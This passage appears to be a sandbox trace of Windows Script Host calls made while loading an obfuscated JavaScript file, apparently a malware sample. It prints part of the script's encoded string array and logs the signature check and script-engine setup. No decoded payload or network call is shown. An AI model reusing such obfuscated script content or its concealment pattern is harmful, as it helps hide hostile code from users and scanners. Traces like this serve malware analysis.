KYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0143.548] UnmapViewOfFile (lpBaseAddress=0x210000) returned 1
	[0143.548] CloseHandle (hObject=0x114) returned 1
	[0143.548] CloseHandle (hObject=0x110) returned 1
	[0143.548] GetSystemDirectoryA (in: lpBuffer=0x31e9c8, uSize=0x0 | out: lpBuffer="\x0cî1") returned 0x14
	[0143.548] ??2@YAPEAX_K@Z () returned 0x4f74d0
	[0143.548] GetSystemDirectoryA (in: lpBuffer=0x4f74d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0143.548] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0143.549] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.549] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0143.549] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0143.549] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0143.549] IdentifyCodeAuthzLevelW () returned 0x1
	[0143.796] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31db40 | out: lpSystemTimeAsFileTime=0x31db40*(dwLowDateTime=0xcdd47380, dwHighDateTime=0x1d543d1)) 
	[0143.796] GetCurrentProcessId () returned 0xd50
	[0143.796] GetCurrentThreadId () returned 0xd54
	[0143.796] GetTickCount () returned 0x3421e
	[0143.796] QueryPerformanceCounter (in: lpPerformanceCount=0x31db48 | out: lpPerformanceCount=0x31db48*=26822247545) returned 1
	[0143.797] malloc (_Size=0x100) returned 0x4f7b60
	[0143.797] GetVersionExA (in: lpVersionInformation=0x31d920*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x31d920*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0143.797] GetUserDefaultLCID () returned 0x409
	[0143.797] IsFileSupportedName () returned 0x1
	[0143.797] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0143.797] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0143.797] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0143.801] GetSignedDataMsg () returned 0x0
	[0143.801] GetCurrentProcess () returned 0xffffffffffffffff
	[0143.801] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x31e180, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x31e180*=0x140) returned 1
	[0143.801] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0143.801] ??2@YAPEAX_K@Z () returned 0x4f9f30
	[0143.801] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0143.801] ReadFile (in: hFile=0x140, lpBuffer=0x4f9f30, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x31e160, lpOverlapped=0x0 | out: lpBuffer=0x4f9f30*, lpNumberOfBytesRead=0x31e160*=0x4b68, lpOverlapped=0x0) returned 1
	[0143.801] CoInitialize (pvReserved=0x0) returned 0x1
	[0143.801] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x31e0d0 | out: ppv=0x31e0d0*=0x4ff4c0) returned 0x0
	[0143.916] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31c2d0 | out: lpSystemTimeAsFileTime=0x31c2d0*(dwLowDateTime=0xcde77e80, dwHighDateTime=0x1d543d1)) 
	[0143.916] GetCurrentProcessId () returned 0xd50
	[0143.916] GetCurrentThreadId () returned 0xd54
	[0143.916] GetTickCount () returned 0x3429a
	[0143.916] QueryPerformanceCounter (in: lpPerformanceCount=0x31c2d8 | out: lpPerformanceCount=0x31c2d8*=26834217934) returned 1
	[0143.916] malloc (_Size=0x100) returned 0x4f7c70
	[0143.916] __dllonexit () returned 0x7fee13e14c0
	[0143.916] __dllonexit () returned 0x7fee13e14e8
	[0143.916] GetVersionExA (in: lpVersionInformation=0x31c0b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xe13e2dc9, dwBuildNumber=0x7fe, dwPlatformId=0xe13e14e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x31c0b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0143.917] GetProcessWindowStation () returned 0x30
	[0143.917] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x31c098, nLength=0xc, lpnLengthNeeded=0x31c090 | out: pvInfo=0x31c098, lpnLengthNeeded=0x31c090) returned 1
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff060
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff0b0
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff0e0
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff120
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff160
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff1a0
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff1e0
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff220
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff260
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff2a0
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff2e0
	[0143.917] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff330
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff370
	[0143.917] DllGetClassObject (in: rclsid=0x53e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x31cda0 | out: ppv=0x31cda0*=0x4ff0b0) returned 0x0
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff0b0
	[0143.917] IClassFactory:CreateInstance (in: This=0x4ff0b0, pUnkOuter=0x0, riid=0x31db80*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x31cdc0 | out: ppvObject=0x31cdc0*=0x4ff4c0) returned 0x0
	[0143.917] ??2@YAPEAX_K@Z () returned 0x4ff3b0
	[0143.917] GetSystemInfo (in: lpSystemInfo=0x31cc00 | out: lpSystemInfo=0x31cc00*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0143.918] VirtualQuery (in: lpAddress=0x31cc70, lpBuffer=0x31cc30, dwLength=0x30 | out: lpBuffer=0x31cc30*(BaseAddress=0x31c000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.918] ??2@YAPEAX_K@Z () returned 0x4ff3f0
	[0143.918] ??2@YAPEAX_K@Z () returned 0x4ff410
	[0143.918] ??2@YAPEAX_K@Z () returned 0x4ff470
	[0143.918] ??2@YAPEAX_K@Z () returned 0x4ff4a0
	[0143.918] ??2@YAPEAX_K@Z () returned 0x4ff550
	[0143.918] IUnknown:AddRef (This=0x4ff4c0) returned 0x2
	[0143.918] IUnknown:Release (This=0x4ff4c0) returned 0x1
	[0143.918] IUnknown:Release (This=0x4ff0b0) returned 0x0
	[0143.918] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.918] IUnknown:QueryInterface (in: This=0x4ff4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x31e008 | out: ppvObject=0x31e008*=0x4ff4c0) returned 0x0
	[0143.918] IUnknown:Release (This=0x4ff4c0) returned 0x1
	[0143.918] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0143.918] IsTextUnicode (in: lpv=0x4f9f30, iSize=19304, lpiResult=0x31e058 | out: lpiResult=0x31e058) returned 0
	[0143.918] GetACP () returned 0x4e4
	[0143.918] malloc (_Size=0x97d0) returned 0xbdfd0
	[0143.919] GetACP () returned 0x4e4
	[0143.919] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4f9f30, cbMultiByte=19304, lpWideCharStr=0xbdfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0143.919] realloc (_Block=0xbdfd0, _Size=0x96d0) returned 0xbdfd0
	[0143.919] ??2@YAPEAX_K@Z () returned 0x4ff0b0
	[0143.920] free (_Block=0xbdfd0) 
	[0143.920] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.920] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.920] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.920] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.920] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.920] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.920] CoUninitialize () 
	[0143.920] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0143.920] CloseHandle (hObject=0x140) returned 1
	[0143.920] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0143.920] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0143.920] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0143.920] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0143.920] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0143.920] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0143.921] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0143.921] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0143.921] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.921] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.921] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0143.921] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0143.921] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.921] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0143.921] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.921] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0143.921] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0143.921] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.921] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0143.921] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0143.921] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0143.921] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0143.921] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0143.921] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.921] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.921] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0143.921] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0143.921] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0143.921] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0143.921] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0143.921] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.921] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.921] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0143.921] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0143.921] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
